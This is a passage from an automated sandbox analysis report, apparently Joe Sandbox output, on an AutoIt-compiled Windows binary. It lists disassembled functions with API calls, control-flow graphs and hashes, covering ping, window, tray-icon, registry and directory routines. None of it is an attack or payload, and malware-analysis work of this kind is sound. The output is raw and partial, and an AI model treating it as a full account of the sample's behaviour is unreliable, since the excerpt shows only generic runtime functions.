                                                • Part of subcall function 00B33411: LoadIconW.USER32(000000A9), ref: 00B334C2
                                                • Part of subcall function 00B33411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 600e9c7f7cf5bd35bce256d05b0e30cc9ccf4669979507358aa2fcd8c84d822a
                                              • Instruction ID: 8c7dbb2691dae4e949b70b7afcccd7fc6c70eb6dd0e343eecff4fc9d21658d66
                                              • Opcode Fuzzy Hash: 600e9c7f7cf5bd35bce256d05b0e30cc9ccf4669979507358aa2fcd8c84d822a
                                              • Instruction Fuzzy Hash: CF212871994308EBEB109FA4ED09BAD7FF4EB09721F00019AF504A72A0DFB55A50DF84
                                              Function 00BA5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 712 ba5e1d-ba5e54 call b34dc0 715 ba5e56-ba5e63 call b3502b 712->715 716 ba5e74-ba5e86 WSAStartup 712->716 715->716 723 ba5e65-ba5e70 call b3502b 715->723 718 ba5e88-ba5e98 call b87135 716->718 719 ba5e9d-ba5edb call b440cd call b34d37 call b4402a inet_addr gethostbyname 716->719 728 ba5ff6-ba5ffe 718->728 733 ba5eec-ba5efc call b87135 719->733 734 ba5edd-ba5eea IcmpCreateFile 719->734 723->716 739 ba5fed-ba5ff1 call b41cb6 733->739 734->733 735 ba5f01-ba5f32 call b50fe6 call b4433f 734->735 744 ba5f34-ba5f53 IcmpSendEcho 735->744 745 ba5f55-ba5f69 IcmpSendEcho 735->745 739->728 746 ba5f6d-ba5f6f 744->746 745->746 747 ba5fa2-ba5fa4 746->747 748 ba5f71-ba5f76 746->748 751 ba5fa6-ba5fb2 call b87135 747->751 749 ba5fba-ba5fcc call b34dc0 748->749 750 ba5f78-ba5f7d 748->750 762 ba5fce-ba5fd0 749->762 763 ba5fd2 749->763 752 ba5f7f-ba5f84 750->752 753 ba5fb4-ba5fb8 750->753 761 ba5fd4-ba5fe8 IcmpCloseHandle WSACleanup call b445ae 751->761 752->747 756 ba5f86-ba5f8b 752->756 753->751 759 ba5f9a-ba5fa0 756->759 760 ba5f8d-ba5f92 756->760 759->751 760->753 765 ba5f94-ba5f98 760->765 761->739 762->761 763->761 765->751
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00BA5E7E
                                              • inet_addr.WSOCK32(?,?,?), ref: 00BA5EC3
                                              • gethostbyname.WS2_32(?), ref: 00BA5ECF
                                              • IcmpCreateFile.IPHLPAPI ref: 00BA5EDD
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA5F4D
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BA5F63
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BA5FD8
                                              • WSACleanup.WSOCK32 ref: 00BA5FDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 3611300a7a3e1c906a32876c00405d179afd3677666c0d49a9ce0fd4d73a1167
                                              • Instruction ID: e9e5993bad63a8c54a7d60d15b2ecda1860fcf2441a42f07f7142f6a95e355f7
                                              • Opcode Fuzzy Hash: 3611300a7a3e1c906a32876c00405d179afd3677666c0d49a9ce0fd4d73a1167
                                              • Instruction Fuzzy Hash: 5F517E316086019FD721EF24DC89F2AB7E4EF49710F1449A9F995EB2A1DB71EE00DB42
                                              Function 00B44D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 766 b44d83-b44dd1 768 b44e31-b44e33 766->768 769 b44dd3-b44dd6 766->769 768->769 770 b44e35 768->770 771 b44e37 769->771 772 b44dd8-b44ddf 769->772 773 b44e1a-b44e22 DefWindowProcW 770->773 774 b44e3d-b44e40 771->774 775 b809c2-b809f0 call b3c460 call b3c483 771->775 776 b44de5-b44dea 772->776 777 b44ead-b44eb5 PostQuitMessage 772->777 784 b44e28-b44e2e 773->784 779 b44e65-b44e8c SetTimer RegisterWindowMessageW 774->779 780 b44e42-b44e43 774->780 813 b809f5-b809fc 775->813 781 b44df0-b44df2 776->781 782 b80a35-b80a49 call b92cce 776->782 778 b44e61-b44e63 777->778 778->784 779->778 787 b44e8e-b44e99 CreatePopupMenu 779->787 785 b80965-b80968 780->785 786 b44e49-b44e5c KillTimer call b45ac3 call b334e4 780->786 788 b44eb7-b44ec1 call b45b29 781->788 789 b44df8-b44dfd 781->789 782->778 807 b80a4f 782->807 793 b8096a-b8096c 785->793 794 b8099e-b809bd MoveWindow 785->794 786->778 787->778 800 b44ec6 788->800 796 b80a1a-b80a21 789->796 797 b44e03-b44e08 789->797 801 b8098d-b80999 SetFocus 793->801 802 b8096e-b80971 793->802 794->778 796->773 804 b80a27-b80a30 call b88854 796->804 805 b44e0e-b44e14 797->805 806 b44e9b-b44eab call b45bd7 797->806 800->778 801->778 802->805 809 b80977-b80988 call b3c460 802->809 804->773 805->773 805->813 806->778 807->773 809->778 813->773 814 b80a02-b80a15 call b45ac3 call b459d3 813->814 814->773
                                              APIs
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00B44E22
                                              • KillTimer.USER32(?,00000001), ref: 00B44E4C
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B44E6F
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B44E7A
                                              • CreatePopupMenu.USER32 ref: 00B44E8E
                                              • PostQuitMessage.USER32(00000000), ref: 00B44EAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                              • String ID: TaskbarCreated
                                              • API String ID: 129472671-2362178303
                                              • Opcode ID: 0ac199cc7cbb80c96883c8495a384d7d263af50392f34c072a7157b446d5bff5
                                              • Instruction ID: 79f4b2c039db2144df91c51ec037f3faf395c943855b402e8138573fd12bd415
                                              • Opcode Fuzzy Hash: 0ac199cc7cbb80c96883c8495a384d7d263af50392f34c072a7157b446d5bff5
                                              • Instruction Fuzzy Hash: 5341E6312D820AABEB297F68DC49B7A36D5F745301F0006E6F502932A2DF619E74F761
                                              Function 00B456F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B80C5B
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • _memset.LIBCMT ref: 00B45787
                                              • _wcscpy.LIBCMT ref: 00B457DB
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B457EB
                                              • __swprintf.LIBCMT ref: 00B80CD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                              • String ID: Line %d: $AutoIt - $C$C$
                                              • API String ID: 230667853-2795402648
                                              • Opcode ID: 4400249ca0e8f96eb7f521fa9651c77b530225080c1fd59cdc24acba5d464fdc
                                              • Instruction ID: b6577fe43668b7f902549ac3400f081b237ec1e4c6082f41d2fbf0c31297850a
                                              • Opcode Fuzzy Hash: 4400249ca0e8f96eb7f521fa9651c77b530225080c1fd59cdc24acba5d464fdc
                                              • Instruction Fuzzy Hash: 7641A171408304AAC321FB64DC85BEB77ECAB44354F000AAAF185931A2DF70A789DB92
                                              Function 00B450DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1060 b450db-b4514b CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B45109
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B4512A
                                              • ShowWindow.USER32(00000000), ref: 00B4513E
                                              • ShowWindow.USER32(00000000), ref: 00B45147
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: ee1c0bae8ed6fe4d151df15f22ca93493f0238c8109b5c4b1a22b86e2af5857d
                                              • Instruction ID: 9c3419384aa73fc12e5f3d59d6405cd7877bf92e7132c0a16599e6623da38af5
                                              • Opcode Fuzzy Hash: ee1c0bae8ed6fe4d151df15f22ca93493f0238c8109b5c4b1a22b86e2af5857d
                                              • Instruction Fuzzy Hash: 01F0B771595294BAEA312B276C48E376E7DD7CBF50F00019EB904A31B0CE611851DAB0
                                              Function 00B99B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1061 b99b16-b99b9b call b44a8c call b99cf1 1066 b99b9d 1061->1066 1067 b99ba5-b99c31 call b44ab2 * 4 call b44a8c call b5593c * 2 call b44ab2 1061->1067 1069 b99b9f-b99ba0 1066->1069 1085 b99c36-b99c5c call b996c4 call b98f0e 1067->1085 1071 b99ce8-b99cee 1069->1071 1090 b99c5e-b99c6e call b52f85 * 2 1085->1090 1091 b99c73-b99c77 1085->1091 1090->1069 1093 b99c79-b99cd6 call b990c1 call b52f85 1091->1093 1094 b99cd8-b99cde call b52f85 1091->1094 1101 b99ce0-b99ce6 1093->1101 1094->1101 1101->1071
                                              APIs
                                                • Part of subcall function 00B44A8C: _fseek.LIBCMT ref: 00B44AA4
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DE1
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DF4
                                              • _free.LIBCMT ref: 00B99C5F
                                              • _free.LIBCMT ref: 00B99C66
                                              • _free.LIBCMT ref: 00B99CD1
                                                • Part of subcall function 00B52F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52F99
                                                • Part of subcall function 00B52F85: GetLastError.KERNEL32(00000000,?,00B59C54,00000000,00B58D5D,00B559C3), ref: 00B52FAB
                                              • _free.LIBCMT ref: 00B99CD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 1552873950-2806939583
                                              • Opcode ID: af3f3d5893a89d2c5ef2c30c012aae9afa45173d51735985587d46273772c0e0
                                              • Instruction ID: 8bf2020e77c229dd28b717e1700645b4ec77a3519e2f35cfdf41d80b980b5cb2
                                              • Opcode Fuzzy Hash: af3f3d5893a89d2c5ef2c30c012aae9afa45173d51735985587d46273772c0e0
                                              • Instruction Fuzzy Hash: 0A5139B1904259ABDF249F64DC81BAEBBF9FF48304F1004EEB649A3241DB715A94CF58
                                              Function 00B5563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1105 b5563d-b55656 1106 b55673 1105->1106 1107 b55658-b5565d 1105->1107 1108 b55675-b5567b 1106->1108 1107->1106 1109 b5565f-b55661 1107->1109 1110 b55663-b55668 call b58d58 1109->1110 1111 b5567c-b55681 1109->1111 1121 b5566e call b58fe6 1110->1121 1113 b55683-b5568d 1111->1113 1114 b5568f-b55693 1111->1114 1113->1114 1116 b556b3-b556c2 1113->1116 1117 b55695-b556a0 call b53010 1114->1117 1118 b556a3-b556a5 1114->1118 1119 b556c4-b556c7 1116->1119 1120 b556c9 1116->1120 1117->1118 1118->1110 1123 b556a7-b556b1 1118->1123 1124 b556ce-b556d3 1119->1124 1120->1124 1121->1106 1123->1110 1123->1116 1127 b557bc-b557bf 1124->1127 1128 b556d9-b556e0 1124->1128 1127->1108 1129 b55721-b55723 1128->1129 1130 b556e2-b556ea 1128->1130 1132 b55725-b55727 1129->1132 1133 b5578d-b5578e call b60dd7 1129->1133 1130->1129 1131 b556ec 1130->1131 1134 b556f2-b556f4 1131->1134 1135 b557ea 1131->1135 1136 b55729-b55731 1132->1136 1137 b5574b-b55756 1132->1137 1146 b55793-b55797 1133->1146 1141 b556f6-b556f8 1134->1141 1142 b556fb-b55700 1134->1142 1143 b557ee-b557f7 1135->1143 1144 b55741-b55745 1136->1144 1145 b55733-b5573f 1136->1145 1139 b55758 1137->1139 1140 b5575a-b5575d 1137->1140 1139->1140 1149 b557c4-b557c8 1140->1149 1150 b5575f-b5576b call b54906 call b6108b 1140->1150 1141->1142 1142->1149 1151 b55706-b5571f call b60ef8 1142->1151 1143->1108 1147 b55747-b55749 1144->1147 1145->1147 1146->1143 1148 b55799-b5579e 1146->1148 1147->1140 1148->1149 1152 b557a0-b557b1 1148->1152 1153 b557da-b557e5 call b58d58 1149->1153 1154 b557ca-b557d7 call b53010 1149->1154 1166 b55770-b55775 1150->1166 1165 b55782-b5578b 1151->1165 1157 b557b4-b557b6 1152->1157 1153->1121 1154->1153 1157->1127 1157->1128 1165->1157 1167 b557fc-b55800 1166->1167 1168 b5577b-b5577e 1166->1168 1167->1143 1168->1135 1169 b55780 1168->1169 1169->1165
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction ID: 9346836fd474bfb031773a9f672b08e7738b85926e1d5efe42d17e9471e55ad0
                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                              • Instruction Fuzzy Hash: D7518E30A00B45DBDB349EA988A07AE77E5EF48323F2487E9FC25962D0D7709D599B40
                                              Function 00B352B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1170 b352b0-b352c0 1171 b352c6-b352cd 1170->1171 1172 b6df28-b6df2f 1170->1172 1173 b352d3-b352ea PeekMessageW 1171->1173 1174 b6df3a-b6df41 1171->1174 1175 b6df35 1172->1175 1176 b3530c 1172->1176 1177 b35313-b35317 1173->1177 1178 b352ec-b352f4 1173->1178 1174->1176 1179 b6df47 1174->1179 1175->1174 1180 b3530e-b35312 1176->1180 1183 b6df95-b6df9c 1177->1183 1184 b3531d-b35326 1177->1184 1181 b352fa-b35306 1178->1181 1182 b6dfab-b6dfbc 1178->1182 1187 b6df4c-b6df52 1179->1187 1185 b35368-b3536d 1181->1185 1186 b35308-b3530a 1181->1186 1183->1182 1184->1187 1188 b3532c-b3533c call b3359e 1184->1188 1185->1180 1186->1176 1189 b3536f-b35374 1186->1189 1190 b6df86 1187->1190 1191 b6df54-b6df60 1187->1191 1196 b35352-b35366 TranslateMessage DispatchMessageW 1188->1196 1197 b3533e-b3534e PeekMessageW 1188->1197 1189->1180 1190->1183 1191->1190 1193 b6df62-b6df66 1191->1193 1193->1190 1195 b6df68-b6df7b TranslateAcceleratorW 1193->1195 1195->1197 1198 b6df81 1195->1198 1196->1197 1197->1178 1199 b35350 1197->1199 1198->1188 1199->1177
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3534A
                                              • TranslateMessage.USER32(?), ref: 00B35356
                                              • DispatchMessageW.USER32(?), ref: 00B35360
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchTranslate
                                              • String ID:
                                              • API String ID: 1795658109-0
                                              • Opcode ID: 803d540ec17939db3b8e618d6ebe8274765ead10bfa43ea1c743ff8fef185391
                                              • Instruction ID: de41712886ad2655098902e6ea3608d8a9d439dffd21df8c5a7cfb82ebed264f
                                              • Opcode Fuzzy Hash: 803d540ec17939db3b8e618d6ebe8274765ead10bfa43ea1c743ff8fef185391
                                              • Instruction Fuzzy Hash: A9310630A487059BEB309B64DC84FBA77E8DB01344F3400EAE423871E1DBB59885D755
                                              Function 00B31284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312A8
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312C9
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B31275,SwapMouseButtons,00000004,?), ref: 00B312EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 82801f2388084ae1375d3d031684f8d1e0e61231269a79b31816efe681b9bbe4
                                              • Instruction ID: f5a7ee58a99652b525eac4388ad4b47edf0f8d06ec289afa1b268d8e953390fe
                                              • Opcode Fuzzy Hash: 82801f2388084ae1375d3d031684f8d1e0e61231269a79b31816efe681b9bbe4
                                              • Instruction Fuzzy Hash: 8C111875514208FFDB208FA8DC84EAFBBECEF05741F204999E805D7110D6719E4097A4
                                              Function 00B93F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00BC2C4C), ref: 00B93F57
                                              • GetLastError.KERNEL32 ref: 00B93F66
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B93F75
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BC2C4C), ref: 00B93FD2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: bfb0e539e563ec3e1ac3dcd1e3e0bceadc0ed81bd47ce7cfffc7b185a57762cf
                                              • Instruction ID: 48df35d0588b89ddb3e5bf4a4037729c6edae3a8bebbfaabf9eb504a6f6d9c95
                                              • Opcode Fuzzy Hash: bfb0e539e563ec3e1ac3dcd1e3e0bceadc0ed81bd47ce7cfffc7b185a57762cf
                                              • Instruction Fuzzy Hash: 6E2162709083019F8B10EF28D885A6FB7F4FE59764F104AADF495C72A2DB31DA46CB52
                                              Function 00B45B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B45B58
                                                • Part of subcall function 00B456F8: _memset.LIBCMT ref: 00B45787
                                                • Part of subcall function 00B456F8: _wcscpy.LIBCMT ref: 00B457DB
                                                • Part of subcall function 00B456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B457EB
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00B45BAD
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B45BBC
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B80D7C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: a65e0a1159c7de7cf8cd493814e7cd2ae1275b7df4de355a319c419f6f7a8f0e
                                              • Instruction ID: 05f692aa6b1bd38bcb1544f4b3e0b9995f8320fc4ca6e31c01338cde39829d52
                                              • Opcode Fuzzy Hash: a65e0a1159c7de7cf8cd493814e7cd2ae1275b7df4de355a319c419f6f7a8f0e
                                              • Instruction Fuzzy Hash: E921F870504B849FE772AB24C895FEABBECDF05304F0404DDE69957292C7746A88DB41
                                              Function 00B4278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B449C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00B427AF,?,00000001), ref: 00B449F4
                                              • _free.LIBCMT ref: 00B7FB04
